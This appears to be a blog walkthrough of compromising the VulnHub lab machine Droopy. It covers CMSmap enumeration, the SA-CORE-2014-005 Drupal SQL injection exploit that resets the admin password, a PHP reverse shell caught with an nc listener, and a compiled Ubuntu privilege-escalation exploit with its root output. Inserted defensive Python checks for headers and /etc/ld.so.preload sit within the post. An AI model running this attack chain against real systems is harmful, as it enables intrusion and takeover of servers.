Friday, 29 April 2016

Walkthrough Droopy v.02

In this post I shall outline the steps I followed to get root on Droopy, hosted at VulnHub: https://www.vulnhub.com/entry/droopy-v02,143/.

From this post onwards I shall try, for posterity, to list all the useful links I used to compromise the box.

Detailed Steps to root:

An nmap scan of the box reveals that only port 80 is open and there seems to be a Drupal 7 website hosted. After running nikto and dirbuster I decided to run a tool to enumerate CMSs. I know a good one exists for WordPress, but surprisingly I could not find much for Drupal. I did come across a tool called CMSmap which, according to its GitHub page, enumerates WordPress, Drupal and Joomla. I decided to give it a try to see what information it could reveal. I also really wanted to learn about Drupal enumeration tools and techniques.

Since the tool is not built into Kali, I decided to follow the GitHub instructions and build it on my box.

./cmsmap.py -t http://192.168.238.132/ -f D -F
[-] Date & Time: 29/04/2016 07:31:43
[-] Target: http://192.168.238.132
[M] Website Not in HTTPS: http://192.168.238.132
[I] Server: Apache/2.4.7 (Ubuntu)
[I] X-Powered-By: PHP/5.5.9-1ubuntu4.5
[L] X-Generator: Drupal 7 (http://drupal.org)
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://192.168.238.132/robots.txt
[I] CMS Detection: Drupal
[I] Drupal Version: 7.30
[H] Drupal Vulnerable to SA-CORE-2014-005
[I] Drupal Theme: bartik
[-] Enumerating Drupal Usernames via "Views" Module...
[I] Autocomplete Off Not Found: http://192.168.238.132/?q=user
[-] Drupal Default Files:
[I] http://192.168.238.132/README.txt
[I] http://192.168.238.132/INSTALL.mysql.txt
[I] http://192.168.238.132/MAINTAINERS.txt
[I] http://192.168.238.132/profiles/standard/translations/README.txt
[I] http://192.168.238.132/profiles/minimal/translations/README.txt
[I] http://192.168.238.132/INSTALL.pgsql.txt
[I] http://192.168.238.132/UPGRADE.txt
[I] http://192.168.238.132/CHANGELOG.txt
[I] http://192.168.238.132/INSTALL.sqlite.txt
[I] http://192.168.238.132/LICENSE.txt
[I] http://192.168.238.132/INSTALL.txt
[I] http://192.168.238.132/COPYRIGHT.txt
[I] http://192.168.238.132/web.config
[I] http://192.168.238.132/modules/README.txt
[I] http://192.168.238.132/modules/simpletest/files/README.txt
[I] http://192.168.238.132/modules/simpletest/files/javascript-1.txt
[I] http://192.168.238.132/modules/simpletest/files/php-1.txt
[I] http://192.168.238.132/modules/simpletest/files/sql-1.txt
[I] http://192.168.238.132/modules/simpletest/files/html-1.txt
[I] http://192.168.238.132/modules/simpletest/tests/common_test_info.txt
[I] http://192.168.238.132/modules/filter/tests/filter.url-output.txt
[I] http://192.168.238.132/modules/filter/tests/filter.url-input.txt
[I] http://192.168.238.132/modules/search/tests/UnicodeTest.txt
[I] http://192.168.238.132/themes/README.txt
[I] http://192.168.238.132/themes/stark/README.txt
[I] http://192.168.238.132/sites/README.txt
[I] http://192.168.238.132/sites/all/modules/README.txt
[I] http://192.168.238.132/sites/all/themes/README.txt
[I] http://192.168.238.132/modules/simpletest/files/html-2.html
[I] http://192.168.238.132/modules/color/preview.html
[I] http://192.168.238.132/themes/bartik/color/preview.html
[-] Interesting Directories/Files ...
[L] http://192.168.238.132/info.php
[L] http://192.168.238.132/install.php
[I] Forgotten Password Allows Username Enumeration: http://192.168.238.132/?q=user/password
[-] Search Drupal Modules ...
[I] comment
[I] content
[I] field
[I] node
[I] search
[I] system
[I] user
[I] aggregator
[I] block
[I] blog
[I] book
[I] color
[I] comment
[I] contact
[I] contextual
[I] dashboard
[I] dblog
[I] field
[I] field_ui
[I] file
[I] filter
[I] forum
[I] help
[I] image
[I] locale
[I] menu
[I] node
[I] openid
[I] overlay
[I] path
[I] php
[I] poll
[I] profile
[I] rdf
[I] search
[I] shortcut
[I] simpletest
[I] statistics
[I] syslog
[I] system
[I] taxonomy
[I] toolbar
[I] tracker
[I] translation
[I] trigger
[I] update
[I] user
[I] Checking for Directory Listing Enabled ...
[L] http://192.168.238.132/includes/
[L] http://192.168.238.132/misc/
[L] http://192.168.238.132/modules/
[L] http://192.168.238.132/profiles/
[L] http://192.168.238.132/scripts/
[L] http://192.168.238.132/sites/
[L] http://192.168.238.132/includes/
[L] http://192.168.238.132/themes/
[L] http://192.168.238.132/modules/comment
[L] http://192.168.238.132/modules/field
[L] http://192.168.238.132/modules/node
[L] http://192.168.238.132/modules/search
[L] http://192.168.238.132/modules/system
[L] http://192.168.238.132/modules/user
[L] http://192.168.238.132/modules/aggregator
[L] http://192.168.238.132/modules/block
[L] http://192.168.238.132/modules/blog
[L] http://192.168.238.132/modules/book
[L] http://192.168.238.132/modules/color
[L] http://192.168.238.132/modules/comment
[L] http://192.168.238.132/modules/contact
[L] http://192.168.238.132/modules/contextual
[L] http://192.168.238.132/modules/dashboard
[L] http://192.168.238.132/modules/dblog
[L] http://192.168.238.132/modules/field
[L] http://192.168.238.132/modules/field_ui
[L] http://192.168.238.132/modules/file
[L] http://192.168.238.132/modules/filter
[L] http://192.168.238.132/modules/forum
[L] http://192.168.238.132/modules/help
[L] http://192.168.238.132/modules/image
[L] http://192.168.238.132/modules/locale
[L] http://192.168.238.132/modules/menu
[L] http://192.168.238.132/modules/node
[L] http://192.168.238.132/modules/openid
[L] http://192.168.238.132/modules/overlay
[L] http://192.168.238.132/modules/path
[L] http://192.168.238.132/modules/php
[L] http://192.168.238.132/modules/poll
[L] http://192.168.238.132/modules/profile
[L] http://192.168.238.132/modules/rdf
[L] http://192.168.238.132/modules/search
[L] http://192.168.238.132/modules/shortcut
[L] http://192.168.238.132/modules/simpletest
[L] http://192.168.238.132/modules/statistics
[L] http://192.168.238.132/modules/syslog
[L] http://192.168.238.132/modules/system
[L] http://192.168.238.132/modules/taxonomy
[L] http://192.168.238.132/modules/toolbar
[L] http://192.168.238.132/modules/tracker
[L] http://192.168.238.132/modules/translation
[L] http://192.168.238.132/modules/trigger
[L] http://192.168.238.132/modules/update
[L] http://192.168.238.132/modules/user
[-] Date & Time: 29/04/2016 07:37:02
[-] Completed in: 0:05:19

The tool was quite good at enumerating the Drupal website and immediately tells us that the site is outdated and suffers from a known vulnerability: "Drupal Vulnerable to SA-CORE-2014-005".
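The CMSmap summary above boils down to three things a site owner can check for themselves: version numbers leaking in response headers, hardening headers that are absent, and a CHANGELOG.txt that tells anyone the exact core version. The following check is an added example for this post, not part of CMSmap or the original walkthrough; the headers and changelog line are constructed samples mirroring what the scan reported, and it assumes (correctly, per the Drupal advisory) that SA-CORE-2014-005 was fixed in core 7.32.

```python
import re

# Constructed sample of the response headers CMSmap reported for the Droopy box
# (retyped for this example, not a live capture).
SAMPLE_HEADERS = {
    "Server": "Apache/2.4.7 (Ubuntu)",
    "X-Powered-By": "PHP/5.5.9-1ubuntu4.5",
    "X-Generator": "Drupal 7 (http://drupal.org)",
}
# Constructed first line of a Drupal 7.30 CHANGELOG.txt, the file CMSmap found
# readable at the web root (real Drupal 7 changelogs open this way).
SAMPLE_CHANGELOG = "Drupal 7.30, 2014-07-24\n"

# Hardening headers CMSmap listed as "Not Enforced"; each tuple holds accepted names.
EXPECTED_HEADERS = (
    ("Strict-Transport-Security",),
    ("X-Frame-Options",),
    ("X-Content-Type-Options",),
    ("Content-Security-Policy", "X-Content-Security-Policy"),
)
FIXED_VERSION = (7, 32)  # SA-CORE-2014-005 was fixed in Drupal core 7.32

def parse_changelog_version(text):
    """Return (major, minor) from the first line of CHANGELOG.txt, or None."""
    m = re.match(r"Drupal (\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2))) if m else None

def assess(headers, changelog=None):
    """Grade a response (plus an exposed CHANGELOG.txt, if any) the way
    CMSmap's summary does; returns a list of findings to fix."""
    found = {k.lower(): v for k, v in headers.items()}
    findings = []
    # A header carrying a version number tells a scanner exactly what to look up.
    for name in ("server", "x-powered-by", "x-generator"):
        if name in found and re.search(r"\d", found[name]):
            findings.append(f"version disclosure in {name}: {found[name]}")
    for names in EXPECTED_HEADERS:
        if not any(n.lower() in found for n in names):
            findings.append(f"missing header: {names[0]}")
    if changelog is not None:
        findings.append("CHANGELOG.txt is web-readable: block or delete it")
        version = parse_changelog_version(changelog)
        if version is not None and version < FIXED_VERSION:
            findings.append(f"Drupal {version[0]}.{version[1]} predates 7.32: SA-CORE-2014-005 unpatched")
    return findings
```

Against the sample data the check reports three version disclosures, four missing headers and the unpatched core version, which is exactly what the scan flagged.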

It seems that SQL injection attacks against the box are possible. I decided to use an existing exploit against the box. The exploit https://www.exploit-db.com/exploits/34984/ changes the admin credentials on the backend site.

python drupal_exploit.py http://192.168.238.132/ admin hello
host username password
http://nope.io admin wowsecure
Success!
Login now with user:admin and pass:hello

The exploit worked and we have now changed the admin credentials on the box. We log in to the box with the credentials "admin:hello".

Once we are able to log in we can create additional posts/pages. Checking under the "Modules" tab I see that there is a module called "PHP filter" which can be enabled to allow PHP content to be executed on a webpage. This opens the possibility of executing PHP reverse shell code by creating a page and requesting it via the webserver, so we try this approach. I use the standard reverse shell from Pentest Monkey.

nc -lvnp 4545
listening on [any] 4545 ...
connect to [192.168.238.133] from (UNKNOWN) [192.168.238.132] 51139
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
09:46:02 up 1:33, 0 users, load average: 0.05, 0.03, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ uname -a
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ hostname
droopy
$ cat /etc/issue
Ubuntu 14.04.1 LTS \n \l
$ arch
x86_64

Once we get a reverse shell we see that the box is a 64-bit Ubuntu 14.04 box, which is known to be vulnerable to the local privilege escalation exploit https://www.exploit-db.com/exploits/37292/. We compile and run the exploit to get root on the box.

$ gcc ubuntu_ex.c -o ub
gcc ubuntu_ex.c -o ub
$ ./ub
./ub
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
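The line "/etc/ld.so.preload created" in the output above is the part a defender should notice: that file makes the dynamic linker load a shared object into every new process, and on a normal server it does not exist at all. The audit below is an added example written for this post (not part of the exploit or the box) that parses the file's contents and flags entries outside the system library directories, not owned by root, group- or world-writable, or missing; stat_table() is a helper so the check can run on constructed data instead of the live filesystem.

```python
import os
import stat
from types import SimpleNamespace

# Directories where a legitimately preloaded shared object is expected to live;
# an entry anywhere else (/tmp, /dev/shm, a web root) deserves a look.
TRUSTED_PREFIXES = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")

def stat_table(entries):
    """Build a stat_of() lookup from {path: (uid, mode)} for offline testing
    (constructed data; the real check uses os.stat)."""
    def stat_of(path):
        if path not in entries:
            raise FileNotFoundError(path)
        uid, mode = entries[path]
        return SimpleNamespace(st_uid=uid, st_mode=mode)
    return stat_of

def audit_preload(content, stat_of=os.stat):
    """Check the text of /etc/ld.so.preload, a whitespace-separated list of
    shared objects the dynamic linker loads into every new process, and
    return a list of findings. An empty file yields no findings."""
    findings = []
    for lib in content.split():
        if not lib.startswith("/"):
            findings.append(f"{lib}: relative path in ld.so.preload")
            continue
        if not lib.startswith(TRUSTED_PREFIXES):
            findings.append(f"{lib}: outside system library directories")
        try:
            st = stat_of(lib)
        except OSError:
            findings.append(f"{lib}: listed but does not exist")
            continue
        if st.st_uid != 0:
            findings.append(f"{lib}: not owned by root (uid {st.st_uid})")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{lib}: writable by group or others")
    return findings

if __name__ == "__main__":
    # On a live host: the file being present at all is the first finding.
    if os.path.exists("/etc/ld.so.preload"):
        with open("/etc/ld.so.preload") as fh:
            print(["/etc/ld.so.preload exists"] + audit_preload(fh.read()))
    else:
        print("/etc/ld.so.preload absent (normal)")
```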

Also, for completeness, I must admit I could have used a Metasploit module to get a shell, but I wanted to avoid using Metasploit as much as possible :0

Final Verdict:

Overall it was a relatively easy box to pwn, but fun nevertheless. Thanks to the creator for taking the time to make one. Keep up the good work, "knightmare".

Useful Links:

https://github.com/Dionach/CMSmap
https://www.drupal.org/SA-CORE-2014-005
https://www.exploit-db.com/exploits/37292/
https://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon
